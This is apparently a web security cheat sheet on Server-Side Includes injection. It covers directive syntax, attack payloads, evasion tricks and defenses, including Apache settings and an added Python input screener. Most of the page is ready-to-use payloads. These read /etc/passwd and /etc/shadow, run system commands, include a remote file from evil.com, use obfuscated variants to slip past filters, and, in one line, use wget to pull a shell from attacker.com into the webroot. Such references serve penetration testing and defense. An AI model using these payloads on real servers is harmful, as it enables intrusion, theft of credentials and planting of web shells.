What is SSI Injection?
Server-Side Includes (SSI) are directives in HTML pages that are evaluated on the server before the page is delivered to the client. SSI injection occurs when an attacker can inject these directives into a page that is then parsed by an SSI-enabled server.
SSI Directive Syntax
Basic syntax: <!--#directive parameter="value" -->
Common SSI Directives
File Operations
<!--#include virtual="/path/to/file" -->
<!--#include file="/path/to/file" -->
<!--#flastmod file="index.html" -->
<!--#fsize file="index.html" -->
Command Execution
<!--#exec cmd="command" -->
<!--#exec cgi="/cgi-bin/script.cgi" -->
Environment Variables
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="REMOTE_ADDR" -->
Flow Control
<!--#if expr="test_condition" -->
<!--#elif expr="test_condition" -->
<!--#else -->
<!--#endif -->
SSI Injection Attack Vectors
Basic Injection Test
<!--#echo var="DATE_LOCAL" -->
If this renders the current date, the server processes SSI directives.
File Disclosure
<!--#include virtual="/etc/passwd" -->
<!--#include file="/etc/passwd" -->
Remote File Inclusion
<!--#include virtual="http://evil.com/malicious-script.html" -->
Command Execution
<!--#exec cmd="ls -la" -->
<!--#exec cmd="cat /etc/passwd" -->
<!--#exec cmd="id" -->
Cross-Site Scripting via SSI
<!--#echo var="QUERY_STRING_UNESCAPED" -->
Directory Traversal
<!--#include virtual="../../../etc/passwd" -->
Advanced Techniques
Chained Exploits
<!--#exec cmd="wget http://attacker.com/shell.php -O /var/www/html/shell.php" -->
Encoded Payloads
URL-encoded:
%3C%21--%23exec%20cmd%3D%22id%22%20--%3E
Environment Variable Abuse
<!--#if expr="${REQUEST_URI} = /admin" -->
<!--#set var="admin" value="true" -->
<!--#endif -->

<!--#echo var="SERVER_SOFTWARE" -->
<!--#echo var="SERVER_NAME" -->
<!--#echo var="REMOTE_HOST" -->
Windows Systems
<!--#exec cmd="dir C:\" -->
<!--#exec cmd="type C:\Windows\win.ini" -->
<!--#exec cmd="net users" -->
Unix/Linux Systems
<!--#exec cmd="uname -a" -->
<!--#exec cmd="cat /etc/shadow" -->
<!--#exec cmd="netstat -an" -->
Web Server Specific
Apache
<!--#exec cmd="apache2ctl -V" -->
<!--#include virtual="/.htaccess" -->
Nginx
<!--#include virtual="/etc/nginx/nginx.conf" -->
Evasion Techniques
Obfuscation
<!--#e<!--#e<!--#exec cmd="id"-->x<!--#e-->ec cmd="ls" -->
Alternative Expressions
<!--#if expr="$DOCUMENT_URI = /\/admin\//?" -->
sensitive content
<!--#endif -->

<!--#exec <!-- comment --> cmd="id" -->
Detection Methods
Testing for SSI Vulnerability
- Input: <!--#echo var="DATE_LOCAL" -->
- Expected output: Current date if vulnerable
Using Error Messages
Input: <!--#echo var="UNDEFINED_VARIABLE" -->
Common Files to Target
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
/var/log/apache2/access.log
/var/log/nginx/access.log
.htaccess
web.config
Defense Mechanisms
Server Configuration
- Disable SSI processing if not needed
- Use the IncludesNOEXEC option to disable the exec command
- Implement proper input validation
- Set restrictive file permissions
Apache Configuration
<Directory "/var/www/html">
    # Use one of the two settings below.
    # Disable SSI processing entirely:
    Options -Includes
    # or keep SSI but disable the exec directive:
    Options +IncludesNOEXEC
</Directory>
Nginx Configuration
Application-Level Defenses
- Validate and sanitize user input
- Implement proper output encoding
- Use Content Security Policy (CSP)
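
Added example (not from the original page): one way to apply the input-validation and output-encoding defenses above in Python, screening request fields for SSI directive syntax after URL-decoding and HTML-encoding values before they are written into a page. The function names, the three-round decode limit and the sample request are assumptions; the payload strings in the sample are the ones listed on this page.

```python
import html
import re
from urllib.parse import unquote

# Opening of an SSI directive: "<!--#" then the directive name (exec, include, echo, ...).
SSI_OPEN = re.compile(r"<!--#\s*([a-z]+)", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # assumption: how many layers of URL-encoding to unwrap


def fully_decode(value: str) -> str:
    """URL-decode repeatedly so encoded input is inspected in its decoded form."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_directives(value: str) -> list[str]:
    """Return the lower-cased directive names found in the decoded value."""
    return [name.lower() for name in SSI_OPEN.findall(fully_decode(value))]


def screen_params(params: dict[str, str]) -> dict[str, list[str]]:
    """Map each request field that carries SSI syntax to the directives seen in it."""
    hits = {field: find_directives(val) for field, val in params.items()}
    return {field: found for field, found in hits.items() if found}


def encode_for_page(value: str) -> str:
    """HTML-encode before writing into a page, so '<!--#' never reaches the SSI parser."""
    return html.escape(value, quote=True)


# Constructed sample request; field names are hypothetical.
SAMPLE = {
    "name": "Alice",
    "comment": '<!--#echo var="DATE_LOCAL" -->',
    "ref": "%3C%21--%23exec%20cmd%3D%22id%22%20--%3E",
}

if __name__ == "__main__":
    for field, found in screen_params(SAMPLE).items():
        print(f"reject {field}: SSI directive(s) {found}")
    print(encode_for_page(SAMPLE["comment"]))
```

Rejecting or encoding the whole value is deliberate: a filter that deletes matched directives in a single pass can leave a new directive behind when directives are nested, as in the Obfuscation entry above.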
SSI File Extensions
SSI is typically processed in these file types:
- .shtml
- .shtm
- .stm
- Sometimes .html if configured